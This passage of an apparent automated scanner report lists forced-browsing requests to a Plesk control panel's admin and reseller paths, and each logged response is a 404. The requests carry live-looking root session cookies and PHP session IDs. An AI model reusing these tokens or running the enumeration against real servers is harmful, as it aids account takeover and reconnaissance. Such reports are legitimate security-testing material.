Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:13:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.184. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/subscription-overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller-self/subscription-overview

Request

GET /reseller-self/subscription-overview HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list?context=subscriptions
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:15:42 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.185. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/

Request

GET /reseller/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.186. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/activate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/activate/

Request

GET /reseller/activate/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.187. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/create

Request

GET /reseller/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.188. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/delete/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/delete/

Request

GET /reseller/delete/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.189. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/list-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/list-data

Request

GET /reseller/list-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.190. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/overview/

Request

GET /reseller/overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.191. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/overview/id/

Request

GET /reseller/overview/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.192. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/suspend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller/suspend/

Request

GET /reseller/suspend/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.193. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:41:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.194. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /role/

Request

GET /role/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.195. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/create/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /role/create/

Request

GET /role/create/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.196. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /role/list/

Request

GET /role/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.197. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/sbin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /sbin/

Request

GET /sbin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.198. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/sbin/nologin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /sbin/nologin

Request

GET /sbin/nologin HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.199. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/server/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /server/

Request

GET /server/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.200. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/server/featured-applications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /server/featured-applications

Request

GET /server/featured-applications HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:44 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.201. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/

Request

GET /skins/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
